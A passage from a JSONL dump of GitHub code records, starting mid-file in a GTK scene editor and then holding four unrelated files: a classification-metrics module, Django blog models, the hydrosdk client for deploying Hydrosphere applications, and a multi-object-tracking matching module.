= self.slider_box.sliders[\"translation-y\"]\n\n oldpos = array(self.oldpos)\n\n translation = array([pos[0] / 2.0, -pos[1] / 2.0])\n\n translation /= self.zoom\n\n x.set(oldpos[0] + translation[0])\n y.set(oldpos[1] + translation[1])\n\n def on_press(self, event):\n # Right click\n if event.get_button()[1] == 3:\n self.deselect()\n # Left click\n elif event.get_button()[1] == 1:\n for actor in self.handles:\n if actor.is_clicked(self.relative_position(event)):\n self.action = actor.drag\n self.old_scale = (self.slider_box.sliders[\"scale-x\"].get(),\n self.slider_box.sliders[\"scale-y\"].get())\n actor.clicked = True\n return\n\n if self.box_actor.is_clicked(self.relative_position(event), self.corner_handles):\n self.action = self.translate\n self.selected = True\n\n pos = self.relative_position(event)\n\n self.oldpos = ((self.slider_box.sliders[\"translation-x\"].get() - pos[0] / self.zoom * 0.5),\n self.slider_box.sliders[\"translation-y\"].get() + pos[1] / self.zoom * 0.5)\n else:\n #clicked outside of box\n self.action = self.rotate\n\n self.oldrot = self.slider_box.sliders[\"rotation-z\"].get() - 
self.get_rotation(event)\n\n def on_motion(self, sink, event):\n if not self.selected:\n return\n\n self.action(event)\n\n def on_release(self, sink, event):\n self.focused_actor = None\n self.action = self.on_hover\n\n self.set_cursor(Gdk.CursorType.ARROW)\n\n for actor in self.handles:\n actor.clicked = False\n\n # cursor stuff\n def on_hover(self, event):\n\n resize_cursors = {\n 90: Gdk.CursorType.BOTTOM_RIGHT_CORNER,\n 180: Gdk.CursorType.BOTTOM_LEFT_CORNER,\n 270: Gdk.CursorType.TOP_LEFT_CORNER,\n 360: Gdk.CursorType.TOP_RIGHT_CORNER\n }\n\n for actor in self.corner_handles.values():\n if actor.is_clicked(self.relative_position(event)):\n rot = self.get_rotation(event) % 360\n for cursor_rot in sorted(resize_cursors):\n if rot < cursor_rot:\n self.set_cursor(resize_cursors[cursor_rot])\n return\n\n resize_cursors_edge = {\n 90: Gdk.CursorType.BOTTOM_SIDE,\n 180: Gdk.CursorType.LEFT_SIDE,\n 270: Gdk.CursorType.TOP_SIDE,\n 360: Gdk.CursorType.RIGHT_SIDE\n }\n\n for actor in self.edge_handles.values():\n if actor.is_clicked(self.relative_position(event)):\n # rotate by 45°, so the detection is not axis aligned\n rot = (self.get_rotation(event) - 45) % 360\n for cursor_rot in sorted(resize_cursors_edge):\n if rot < cursor_rot:\n self.set_cursor(resize_cursors_edge[cursor_rot])\n return\n\n if self.box_actor.is_clicked(self.relative_position(event), self.corner_handles):\n # inside box\n self.set_cursor(Gdk.CursorType.ARROW)\n else:\n # rotate\n self.set_cursor(Gdk.CursorType.EXCHANGE)\n","repo_name":"lubosz/gst-gl-tests","sub_path":"gst_opengl_editor/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":12326,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"39646425973","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport torch\n\n\ndef precision_single_class(y_true, y_pred, cls):\n \"\"\"\n Precision over a single class\n\n Args:\n y_true: array\n array of true labels\n y_pred: array\n array of predicted labels\n cls: int\n class over which to calculate precision\n \"\"\"\n\n y_true = (y_true == cls).astype(int) # single class true labels\n y_pred = (y_pred == cls).astype(int) # single class predicted labels\n\n true_pos = y_true * y_pred # true positives\n false_pos = y_pred - true_pos # false positives\n\n true_pos = np.sum(true_pos)\n false_pos = np.sum(false_pos)\n\n if true_pos + false_pos == 0.0:\n return 0.0\n\n return true_pos / (true_pos + false_pos)\n\n\ndef recall_single_class(y_true, y_pred, cls):\n \"\"\"\n Recall over a single class\n\n Args:\n y_true: array\n array of true labels\n y_pred: array\n array of predicted labels\n cls: int\n class over which to calculate precision\n \"\"\"\n\n y_true = (y_true == cls).astype(int) # single class true labels\n y_pred = (y_pred == cls).astype(int) # single class predicted labels\n\n true_pos = y_true * y_pred # true positives\n false_neg = (1 - y_pred) * y_true # false negatives\n\n true_pos = np.sum(true_pos)\n false_neg = np.sum(false_neg)\n\n if true_pos + false_neg == 0.0:\n return 0.0\n\n return true_pos / (true_pos + false_neg)\n\n\ndef f1_single_class(y_true, y_pred, cls):\n \"\"\"\n F1 over a single class\n\n Args:\n y_true: array\n array of true labels\n y_pred: array\n array of predicted labels\n cls: int\n class over which to calculate precision\n \"\"\"\n precision = precision_single_class(y_true, y_pred, cls)\n recall = recall_single_class(y_true, y_pred, cls)\n\n if precision + recall == 0.0:\n return 0.0\n\n 
return 2 * precision * recall / (precision + recall)\n\n\ndef accuracy_single_class(y_true, y_pred, cls):\n    \"\"\"\n    Accuracy over a single class\n\n    Args:\n        y_true: array\n            array of true labels\n        y_pred: array\n            array of predicted labels\n        cls: int\n            class over which to calculate accuracy\n    \"\"\"\n    y_true = (y_true == cls)  # single class true labels\n    y_pred = (y_pred == cls)  # single class predicted labels\n    acc = (y_true == y_pred).mean()\n    return acc\n\n\ndef accuracy(y_true, y_pred):\n    \"\"\"\n    Accuracy\n\n    Args:\n        y_true: array\n            array of true labels\n        y_pred: array\n            array of predicted labels\n    \"\"\"\n    acc = (y_true == y_pred).mean()\n    return acc\n\n\ndef f1_average(y_true, y_pred, n_classes):\n    \"\"\"\n    F1 average over all classes\n\n    Args:\n        y_true: array\n            array of true labels\n        y_pred: array\n            array of predicted labels\n        n_classes: int\n            total number of classes\n    \"\"\"\n\n    f1_scores = [f1_single_class(y_true, y_pred, i) for i in range(n_classes)]\n    f1_scores = np.array(f1_scores)\n    return np.sum(f1_scores) / len(f1_scores)\n\n\ndef precision_average(y_true, y_pred, n_classes):\n    \"\"\"\n    Precision average over all classes\n\n    Args:\n        y_true: array\n            array of true labels\n        y_pred: array\n            array of predicted labels\n        n_classes: int\n            total number of classes\n    \"\"\"\n\n    prec_scores = [precision_single_class(y_true, y_pred, i) for i in range(n_classes)]\n    return sum(prec_scores) / len(prec_scores)\n\n\ndef recall_average(y_true, y_pred, n_classes):\n    \"\"\"\n    Recall average over all classes\n\n    Args:\n        y_true: array\n            array of true labels\n        y_pred: array\n            array of predicted labels\n        n_classes: int\n            total number of classes\n    \"\"\"\n\n    recall_scores = [recall_single_class(y_true, y_pred, i) for i in range(n_classes)]\n    return sum(recall_scores) / len(recall_scores)\n\n\nclass Meter():\n    def __init__(self, factor_ema=0.99, n_classes=8):\n        self.factor_ema = factor_ema\n        self.n_classes = n_classes\n\n        self.labels_true = []\n        self.labels_pred = []\n\n        self.metrics = {'accuracy', 'f1', 'precision', 'recall'}\n\n        self.getter = {}\n        self.getter['accuracy'] = lambda x, y: accuracy(x, y)\n        self.getter['f1'] = lambda x, y: f1_average(x, y, self.n_classes)\n        self.getter['precision'] = lambda x, y: precision_average(x, y, self.n_classes)\n        self.getter['recall'] = lambda x, y: recall_average(x, y, self.n_classes)\n\n        self.all = {}\n        self.ema = {}\n        self.total = {}\n        for m in self.metrics:\n            self.all[m] = []\n            self.ema[m] = 0.0\n            self.total[m] = 0.0\n\n        self.log_ema = {}\n        self.log_all = {}\n\n    def add(self, labels_pred, labels_true):\n        \"\"\"\n        add new measurements\n        \"\"\"\n        if isinstance(labels_pred, torch.Tensor):\n            labels_pred = labels_pred.cpu().numpy()\n        if isinstance(labels_true, torch.Tensor):\n            labels_true = labels_true.cpu().numpy()\n\n        # accumulate labels for aggregate metrics\n        self.labels_true.append(labels_true)\n        self.labels_pred.append(labels_pred)\n\n        # get metrics for batch\n        for m in self.metrics:\n            self.all[m].append(self.getter[m](labels_true, labels_pred))\n            self.ema[m] = self.factor_ema * self.ema[m] + (1 - self.factor_ema) * self.all[m][-1]\n\n    def get_metrics_total(self):\n        labels_true, labels_pred = self._concat()  # turn list into array\n        for m in self.metrics:\n            self.total[m] = self.getter[m](labels_true, labels_pred)\n        return self.total\n\n    def get_metrics_ema(self):\n        return self.ema\n\n    def get_metrics_last(self):\n        return {key: val[-1] for key, val in self.all.items()}\n\n    def get_metrics_all(self):\n        return self.all\n\n    def _concat(self):\n        if isinstance(self.labels_true, list):\n            labels_true =
np.concatenate(self.labels_true)\n if isinstance(self.labels_pred, list):\n labels_pred = np.concatenate(self.labels_pred)\n self.labels_true = []\n self.labels_pred = []\n return labels_true, labels_pred\n\n def log(self, name, val):\n if name not in self.log_ema:\n self.log_ema[name] = val\n self.log_all[name] = [val]\n else:\n self.log_ema[name] = self.log_ema[name] * self.factor_ema + \\\n (1 - self.factor_ema) * val\n self.log_all[name].append(val)\n\n def get_log_last(self):\n return {key: val[-1] for key, val in self.log_all.items()}\n\n def get_log_ema(self):\n return self.log_ema\n\n def get_log_all(self):\n return self.log_all\n\n def get_message(self, loss=False):\n msg = \"\"\n metrics_last = self.get_metrics_last()\n metrics_ema = self.get_metrics_ema()\n # accuracy\n acc_iter = metrics_last['accuracy'] * 100\n acc_ema = metrics_ema['accuracy'] * 100\n msg += f'[ACC_ITER: {acc_iter:.2f}]'\n msg += f'[ACC_EMA: {acc_ema:.2f}]'\n # f1\n f1_iter = metrics_last['f1'] * 100\n f1_ema = metrics_ema['f1'] * 100\n msg += f'[F1_ITER: {f1_iter:.2f}]'\n msg += f'[F1_EMA: {f1_ema:.2f}]'\n\n if loss:\n log_last = self.get_log_last()\n log_ema = self.get_log_ema()\n # loss ce\n loss_ce_iter = log_last['loss_ce']\n loss_ce_ema = log_ema['loss_ce']\n msg += f'[LOSS_CE_ITER: {loss_ce_iter:.2f}]'\n msg += f'[LOSS_CE_EMA: {loss_ce_ema:.2f}]'\n # loss mu\n loss_mu_iter = log_last['loss_mu']\n loss_mu_ema = log_ema['loss_mu']\n msg += f'[LOSS_MU_ITER: {loss_mu_iter:.2f}]'\n msg += f'[LOSS_MU_EMA: {loss_mu_ema:.2f}]'\n # loss center\n loss_center_iter = log_last['loss_center']\n loss_center_ema = log_ema['loss_center']\n msg += f'[LOSS_CENTER_ITER: {loss_center_iter:.2f}]'\n msg += f'[LOSS_CENTER_EMA: {loss_center_ema:.2f}]'\n\n return msg\n\n\nif __name__ == '__main__':\n m = Meter(n_classes=2)\n a = np.array([1, 1, 1])\n b = np.array([1, 1, 0])\n m.add(a, b)\n m.add(a, b)\n m.add(a, b)\n m.add(a, b)\n m.add(a, a)\n print(m.get_metrics_last())\n print(m.get_metrics_ema())\n print(m.get_metrics_total())\n","repo_name":"takihasan/ARBEx","sub_path":"arbex/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":8451,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"69867022842","text":"import datetime\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom ckeditor_uploader.fields import RichTextUploadingField\n\n\nREQUEST_CHOICES = (\n ('api', 'api'),\n ('template', 'template')\n)\nDEGREE = (\n ('metric', 'Metriculate'),\n ('inter', 'Intermediate'),\n ('grad', 'Graduation'),\n ('pg', 'Post-Graduation'),\n ('dr', 'doctorate'),\n)\nYEAR_CHOICES = [(r, r) for r in range(1950, datetime.date.today().year + 5)]\nRATING_CHOICES = [(r, r) for r in range(0, 101)]\n\n\nclass User(AbstractUser):\n is_editor = models.BooleanField(default=False)\n is_chief = models.BooleanField(default=False)\n\n\nclass Post(models.Model):\n owner = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='posts'\n )\n title = models.CharField(max_length=255)\n text = RichTextUploadingField()\n created_date = models.DateTimeField(auto_now_add=True)\n published_date = models.DateTimeField(auto_now_add=True)\n is_approve = models.BooleanField(default=False)\n is_deleted = models.BooleanField(default=False)\n request_from = models.CharField(\n max_length=10,\n choices=REQUEST_CHOICES,\n default='template'\n )\n\n def __str__(self):\n return self.title\n\n def delete(self):\n self.is_deleted = True\n 
self.save()\n\n def save(self, *args, **kwargs):\n self.full_clean() # performs regular validation then clean()\n super(Post, self).save(*args, **kwargs)\n\n def clean(self):\n self.text = self.text.strip()\n\n class Meta:\n ordering = [\"-created_date\"]\n\n\nclass Editor(models.Model):\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE,\n primary_key=True\n )\n\n def __str__(self):\n return self.user\n\n\nclass Comment(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='comment'\n )\n blog = models.ForeignKey(Post, on_delete=models.CASCADE)\n comment = models.TextField()\n comment_datetime = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['-comment_datetime']\n\n\nclass Reply(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='reply'\n )\n blog = models.ForeignKey(Post, on_delete=models.CASCADE)\n which_comment = models.ForeignKey(Comment, on_delete=models.CASCADE)\n reply = models.TextField()\n reply_datetime = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['-reply_datetime']\n","repo_name":"ashshakya/Confession","sub_path":"blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9856763572","text":"from enum import Enum\nfrom typing import List, Optional, Dict\nimport json\nimport datetime\n\nimport sseclient\nfrom google.protobuf.json_format import MessageToDict\n\nfrom hydro_serving_grpc.serving.contract.signature_pb2 import ModelSignature\n\nfrom hydrosdk.cluster import Cluster\nfrom hydrosdk.signature import signature_dict_to_ModelSignature\nfrom hydrosdk.data.types import PredictorDT\nfrom hydrosdk.deployment_configuration import DeploymentConfiguration\nfrom hydrosdk.modelversion import ModelVersion\nfrom hydrosdk.predictor import PredictServiceClient, MonitorableApplicationPredictionService\nfrom hydrosdk.utils import handle_request_error\nfrom hydrosdk.exceptions import TimeoutException\nfrom pydantic import BaseModel\n\nclass StreamingParams(BaseModel):\n sourceTopic: str\n destinationTopic: str\n\nclass ModelVariant(BaseModel):\n modelVersionId: int\n weight: int\n deploymentConfigurationName: Optional[str]\n servableName: Optional[str]\n\n\nclass ApplicationStatus(Enum):\n FAILED = 0\n ASSEMBLING = 1\n READY = 2\n\n\nclass Application:\n \"\"\"\n Applications are used to combine your ModelVersions into a linear graph and deploy \n it into production, exposing HTTP and gRPC interfaces for consumers.\n\n Use ApplicationBuilder class to create a new Application in your Hydrosphere cluster\n or an Application.find method to get the existing Application.\n\n :Example:\n\n List all applications created on the cluster.\n\n >>> from hydrosdk.cluster import Cluster \n >>> cluster = Cluster(\"http-cluster-endpoint\")\n >>> apps = Application.list(cluster)\n >>> for app in apps: \n >>> print(app)\n\n Find an application by name and perform a prediction from it.\n\n >>> from hydrosdk.cluster import Cluster\n >>> cluster = Cluster(\"http-cluster-endpoint\", \"grpc-cluster-endpoint\") # important to use a gRPC endpoint \n >>> app = Application.find(cluster, \"my-application\")\n >>> pred = app.predictor()\n >>> resp = pred.predict({\"my-input\": 1})\n \"\"\"\n _BASE_URL = \"/api/v2/application\"\n\n @staticmethod\n def list(cluster: Cluster) -> List['Application']:\n \"\"\"\n List all available applications from 
the cluster.\n\n :param cluster: active cluster\n :return: deserialized list of application objects\n \"\"\"\n resp = cluster.request(\"GET\", Application._BASE_URL)\n handle_request_error(\n resp, f\"Failed to list all applications. {resp.status_code} {resp.text}\")\n applications = [Application._from_json(cluster, app_json)\n for app_json in resp.json()]\n return applications\n\n @staticmethod\n def find(cluster: Cluster, application_name: str) -> 'Application':\n \"\"\"\n Search for an application by name. \n\n :param cluster: active cluster\n :param application_name: application name\n :return: deserialized application object\n \"\"\"\n resp = cluster.request(\"GET\", f\"{Application._BASE_URL}/{application_name}\")\n handle_request_error(\n resp, f\"Failed to find an application by name={application_name}. {resp.status_code} {resp.text}\")\n return Application._from_json(cluster, resp.json())\n\n @staticmethod\n def delete(cluster: Cluster, application_name: str) -> dict:\n \"\"\"\n Delete an application by name.\n\n :param cluster: active cluster\n :param application_name: application name\n :return: response from the cluster\n \"\"\"\n resp = cluster.request(\"DELETE\", f\"{Application._BASE_URL}/{application_name}\")\n handle_request_error(\n resp, f\"Failed to delete application for name={application_name}. {resp.status_code} {resp.text}\")\n return resp.json()\n\n @staticmethod\n def _from_json(cluster: Cluster, application_json: dict) -> 'Application':\n \"\"\"\n Deserialize json into application object. \n\n :param cluster: active cluster\n :param application_json: input json with application object fields\n :return: application object\n \"\"\"\n id_ = application_json.get(\"id\")\n name = application_json.get(\"name\")\n execution_graph = ExecutionGraph._from_json(cluster, application_json.get(\"executionGraph\"))\n kafka_streaming = [StreamingParams(sourceTopic=kafka_param[\"in-topic\"], destinationTopic=kafka_param[\"out-topic\"])\n for kafka_param in application_json.get(\"kafkaStreaming\")]\n metadata = application_json.get(\"metadata\")\n message = application_json.get(\"message\")\n signature = signature_dict_to_ModelSignature(data=application_json.get(\"signature\"))\n status = ApplicationStatus[application_json.get(\"status\").upper()]\n\n app = Application(cluster=cluster,\n id=id_,\n name=name,\n execution_graph=execution_graph,\n status=status,\n signature=signature,\n kafka_streaming=kafka_streaming,\n metadata=metadata,\n message=message)\n return app\n\n def lock_while_starting(self, timeout: int = 120) -> 'Application':\n \"\"\" Wait for an application to become ready. 
\"\"\"\n events_stream = self.cluster.request(\"GET\", \"/api/v2/events\", stream=True)\n events_client = sseclient.SSEClient(events_stream)\n\n self.status = self.find(self.cluster, self.name).status\n if self.status is ApplicationStatus.READY: \n return self\n if self.status is ApplicationStatus.FAILED:\n raise ValueError(f'Application initialization failed {self.message}')\n try:\n deadline_at = datetime.datetime.now().timestamp() + timeout\n for event in events_client.events():\n if datetime.datetime.now().timestamp() > deadline_at:\n raise TimeoutException('Time out waiting for an application to become available')\n if event.event == \"ApplicationUpdate\":\n data = json.loads(event.data)\n print(data)\n if data.get(\"name\") == self.name:\n self.status = ApplicationStatus[data.get(\"status\").upper()]\n if self.status is ApplicationStatus.READY:\n return self\n elif self.status is ApplicationStatus.FAILED:\n raise ValueError('Application initialization failed')\n finally:\n events_client.close()\n\n def predictor(self, return_type=PredictorDT.DICT_NP_ARRAY) -> PredictServiceClient:\n \"\"\"\n Return a predictor object which is used to transform your data\n into a proto message, pass it via gRPC to the cluster and decode\n the cluster output from proto to a dict with Python dtypes.\n\n :param return_type: Specifies into which format should predictor serialize model output.\n Numpy dtypes, Python dtypes or pd.DataFrame are supported.\n :return: PredictServiceClient with .predict() method which accepts your data\n \"\"\"\n impl = MonitorableApplicationPredictionService(channel=self.cluster.channel, target=self.name)\n return PredictServiceClient(impl=impl, signature=self.signature, return_type=return_type)\n\n def to_dict(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"signature\": MessageToDict(self.signature),\n \"execution_graph\": self.execution_graph.to_dict(),\n \"metadata\": self.metadata,\n \"message\": self.message,\n \"status\": self.status.name,\n }\n \n def __init__(self, cluster: Cluster, id: int, name: str, execution_graph: 'ExecutionGraph',\n status: ApplicationStatus, signature: ModelSignature,\n kafka_streaming: List[StreamingParams],\n metadata: Optional[Dict[str, str]] = None,\n message: Optional[str] = None) -> 'Application':\n \"\"\"\n :param cluster: active cluster\n :param id: unique application ID\n :param name: application Name\n :param signature: signature, specifying input and output fields names, dtypes and shapes\n :param execution_graph: linear graph which specifies ExecutionStages which sequentially transform input\n :param status: Application Status\n :param kafka_streaming: list of Kafka parameters with input and output Kafka topics specified\n :param metadata: metadata with string keys and string values.\n :param message: possible error message from the cluster\n \"\"\"\n self.id = id\n self.name = name\n self.execution_graph = execution_graph\n self.kafka_streaming = kafka_streaming\n self.metadata = metadata\n self.status = status\n self.signature = signature\n self.cluster = cluster\n self.message = message\n\n def __str__(self):\n return f\"Application {self.id} {self.name}\"\n\n\nclass ApplicationBuilder:\n \"\"\"\n ApplicationBuilder is used to create new Applications in your cluster.\n\n :Example:\n \n Create an application from existing modelversions.\n\n >>> from hydrosdk import Cluster, ModelVersion\n >>> cluster = Cluster('http-cluster-endpoint')\n >>> mv1 = ModelVersion.find(cluster, \"my-model\", 1)\n >>> mv2 = 
ModelVersion.find(cluster, \"my-model\", 2)\n >>> stage = ExecutionStageBuilder() \\\n .with_model_variant(mv1, 50) \\\n .with_model_variant(mv2, 50) \\ \n .build()\n >>> app = ApplicationBuilder(\"my-application-ab-test\") \\\n .with_stage(stage) \\\n .build(cluster)\n \"\"\"\n\n def __init__(self, name: str) -> 'ApplicationBuilder':\n \"\"\"\n :param cluster: Hydrosphere cluster where you want to create an Application\n :param name: Future Application name\n \"\"\"\n self.name = name\n self.stages = []\n self.metadata = {}\n self.streaming_parameters = []\n\n def with_stage(self, stage: 'ExecutionStage') -> 'ApplicationBuilder':\n \"\"\"\n Add an ExecutionStage to your Application. See ExecutionStage for more information.\n\n :param stage:\n :return:\n \"\"\"\n self.stages.append(stage)\n return self\n\n def with_metadata(self, key: str, value: str) -> 'ApplicationBuilder':\n \"\"\"\n Add a metadata value to your future Application.\n\n :param key: string key under which `value` will be stored\n :param value: string value\n :return:\n \"\"\"\n self.metadata[key] = value\n return self\n\n def with_metadatas(self, metadata: Dict[str, str]) -> 'ApplicationBuilder':\n \"\"\"\n Add a metadata to your future Application.\n\n :param metadata: a dict containing metadata for your application\n :return:\n \"\"\"\n self.metadata.update(metadata)\n return self\n\n def with_kafka_params(self, source_topic: str, dest_topic: str) -> 'ApplicationBuilder':\n \"\"\"\n Add a kafka parameters to your Application.\n\n :param source_topic: source Kafka topic\n :param dest_topic: destination Kafka topic\n :return:\n \"\"\"\n params = StreamingParams(sourceTopic=source_topic, destinationTopic=dest_topic)\n self.streaming_parameters.append(params)\n return self\n\n def build(self, cluster: Cluster) -> Application:\n \"\"\"\n Create an Application in your Hydrosphere cluster.\n\n :return: Application object\n \"\"\"\n if not self.stages:\n raise ValueError(\"No execution stages were provided\")\n\n execution_graph = ExecutionGraph(stages=self.stages)\n application_json = {\"name\": self.name,\n \"kafkaStreaming\": [sp.to_dict() for sp in self.streaming_parameters],\n \"executionGraph\": execution_graph.to_dict(),\n \"metadata\": self.metadata}\n\n resp = cluster.request(\"POST\", Application._BASE_URL, json=application_json)\n handle_request_error(\n resp, f\"Failed to create an application {self.name}. {resp.status_code} {resp.text}\")\n return Application._from_json(cluster, resp.json())\n\n\nclass ExecutionGraph:\n def __init__(self, stages: List['ExecutionStage']) -> 'ExecutionGraph':\n \"\"\"\n ExecutionGraph is a representation of a linear graph which is used\n by Hydrosphere to create pipelines of ModelVersions. This linear graph\n consists of ExecutionStages following each other. See ExecutionStage to learn more.\n\n :param stages: list of ExecutionStages used to sequentially transform input.\n \"\"\"\n self.stages = stages\n\n def to_dict(self) -> Dict[str, List]:\n return {\"stages\": [s.to_dict() for s in self.stages]}\n\n @staticmethod\n def _from_json(cluster: Cluster, ex_graph_dict: Dict) -> 'ExecutionGraph':\n return ExecutionGraph([ExecutionStage._from_json(cluster, stage)\n for stage in ex_graph_dict['stages']])\n\n\nclass ExecutionStage:\n def __init__(self, model_variants: List[ModelVariant], signature: Optional[ModelSignature]) -> 'ExecutionStage':\n \"\"\"\n ExecutionStage is a single stage in a linear graph of ExecutionGraph. 
Each stage\n        may contain from 1 to many different ModelVersions with the same signature. Every input\n        request routed to this stage will be automatically shadowed to all ModelVersions inside\n        of it. Stage output response will be selected according to the relative weights associated\n        with each version.\n\n        :param model_variants: list of ModelVersions with corresponding weights\n        :param signature: signature specifying input and output field names, data types and shapes.\n        \"\"\"\n        self.signature = signature\n        self.model_variants = model_variants\n\n    def to_dict(self) -> Dict[str, List[Dict[str, int]]]:\n        model_variants = []\n        for model_variant in self.model_variants:\n            dict_repr = {\n                'modelVersionId': model_variant.modelVersionId,\n                'weight': model_variant.weight,\n                'deploymentConfigName': model_variant.deploymentConfigurationName,\n            }\n            model_variants.append(dict_repr)\n        return {\"modelVariants\": model_variants}\n\n    @staticmethod\n    def _from_json(cluster: Cluster, execution_stage_dict: Dict) -> 'ExecutionStage':\n        execution_stage_signature = signature_dict_to_ModelSignature(execution_stage_dict['signature'])\n        model_variants = [ModelVariant.parse_obj(mv) for mv in execution_stage_dict['modelVariants']]\n        return ExecutionStage(model_variants=model_variants, signature=execution_stage_signature)\n\n\nclass ExecutionStageBuilder:\n    def __init__(self) -> 'ExecutionStageBuilder':\n        \"\"\"\n        Builder class that helps build an ExecutionStage.\n        \"\"\"\n        self.model_variants = []\n\n    def __validate(self):\n        \"\"\"\n        Validate the stage for correctness.\n        \"\"\"\n        if len(self.model_variants) == 0:\n            raise ValueError(\"At least one model variant should be specified.\")\n\n        if sum(variant.weight for variant in self.model_variants) != 100:\n            raise ValueError(\"All model variants' weights inside the same stage must sum up to 100\")\n\n    def with_model_variant(self, model_version: ModelVersion,\n                           weight: int,\n                           deployment_configuration: Optional[DeploymentConfiguration] = None) -> 'ExecutionStageBuilder':\n        \"\"\"\n        Add a ModelVersion with a weight to an ExecutionStage.\n        \n        :param model_version: ModelVersion to which input requests will be shadowed\n        :param weight: Weight which affects the chance of choosing a model output as an\n         output of an ExecutionStage\n        :param deployment_configuration: K8s Deployment Configuration of this Model Variant\n        :return: self\n        \"\"\"\n        dc_name = None\n        if deployment_configuration is not None:\n            dc_name = deployment_configuration.name\n        mv = ModelVariant(\n            modelVersionId=model_version.id,\n            weight=weight,\n            deploymentConfigurationName=dc_name,\n            servableName=None\n        )\n        self.model_variants.append(mv)\n        return self\n\n    def build(self) -> 'ExecutionStage':\n        \"\"\"\n        Verify that all ModelVersions inside an ExecutionStage have the same signature\n        and finally create an ExecutionStage.\n\n        :return: the assembled ExecutionStage\n        \"\"\"\n        self.__validate()\n        return ExecutionStage(model_variants=self.model_variants, signature=None)\n","repo_name":"Hydrospheredata/hydro-serving-sdk","sub_path":"hydrosdk/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":16854,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"}
{"seq_id":"73983839479","text":"import numpy as np\nfrom scipy.spatial.distance import cdist\nimport lap\nfrom minitrack.utils.np_util import np_box_iou\nfrom .kalman_filter import chi2inv95\n\n\ndef min_cost_matching(distance_metric, thresh, tracks, detectobjs, track_indices=None, detection_indices=None):\n    if track_indices is None:\n        track_indices = list(range(len(tracks)))\n    if detection_indices is None:\n        detection_indices = list(range(len(detectobjs)))\n\n    if len(detection_indices) == 0 or len(track_indices) == 0:\n        return [], track_indices, detection_indices  # Nothing to match.\n\n    cost_matrix = distance_metric(tracks, detectobjs, track_indices, detection_indices)\n    _, row_indices, col_indices = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh)\n\n    track_indices = np.asarray(track_indices)\n    detection_indices = np.asarray(detection_indices)\n    unmatched_tracks = track_indices[np.where(row_indices < 0)[0]].tolist()\n    unmatched_detections = detection_indices[np.where(col_indices < 0)[0]].tolist()\n\n    matches = []\n    for irow, icol in enumerate(row_indices):\n        if icol >= 0:\n            track_idx = track_indices[irow]\n            detection_idx = detection_indices[icol]\n            if cost_matrix[irow, icol] > thresh:\n                unmatched_tracks.append(track_idx)\n                unmatched_detections.append(detection_idx)\n            else:\n                matches.append((track_idx, detection_idx))\n\n    #print('unmatched_detections',unmatched_detections)\n    return matches, unmatched_tracks, unmatched_detections\n\ndef matching_cascade(distance_metric, thresh, cascade_depth, tracks, detections, track_indices=None, detection_indices=None):\n    if track_indices is None:\n        track_indices = list(range(len(tracks)))\n    if detection_indices is None:\n        detection_indices = list(range(len(detections)))\n\n    unmatched_detections = detection_indices\n    matches = []\n\n    for level in range(cascade_depth):\n        if len(unmatched_detections) == 0:  # No detections left\n            break\n        track_indices_l = [k for k in track_indices if tracks[k].time_since_update == 1 + level]\n        if len(track_indices_l) == 0:  # Nothing to match at this level\n            continue\n        matches_l, _, unmatched_detections = min_cost_matching(distance_metric, thresh, tracks, detections, track_indices_l, unmatched_detections)\n        matches += matches_l\n\n    unmatched_tracks = list(set(track_indices) - set(k for k, _ in matches))\n    return matches, unmatched_tracks, unmatched_detections\n\ndef iou_cost(tracks, detections, track_indices, detection_indices):\n\n    det_ltrb = np.array([detections[i].ltrb for i in detection_indices])\n    track_ltrb = np.array([tracks[i].ltrb for i in track_indices])\n\n    ious = np_box_iou(track_ltrb, det_ltrb)\n    cost_ious = 1 - ious\n    return cost_ious\n\ndef embedding_cost(tracks, detections, track_indices, detection_indices):\n    det_feat = np.array([detections[i].feature for i in detection_indices])\n    track_feat = np.array([tracks[i].smooth_feat for i in track_indices])\n    cost_matrix = np.maximum(0.0, cdist(track_feat, det_feat))\n    # cdist defaults to Euclidean distance here\n    # because the embeddings were passed through F.normalize in the forward pass,\n    # the Euclidean distance is equivalent to 1 - cosine similarity (up to a monotone transform)\n    return cost_matrix\n\ndef gate_cost_funct(kf, cost_matrix, tracks, detections, track_indices, detection_indices, only_position=False, lambda_=0.98):\n    gating_dim = 2 if only_position else 4\n    gating_threshold = chi2inv95[gating_dim]\n    measurements = np.asarray([detections[i].xyah for i in detection_indices])\n    for row, track_idx in enumerate(track_indices):\n        # gating_distance is the Mahalanobis distance\n        # cost_matrix holds the appearance-feature cost\n        track = tracks[track_idx]\n        gating_distance = kf.gating_distance(track.mean, track.covariance, measurements, only_position, metric='maha')\n        cost_matrix[row, gating_distance > gating_threshold] = np.inf\n        cost_matrix[row] = lambda_ * cost_matrix[row] + (1 - lambda_) * gating_distance\n    return cost_matrix\n\n\n\n\n","repo_name":"Bilibilee/minitrack","sub_path":"minitrack/tracker/utils/matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
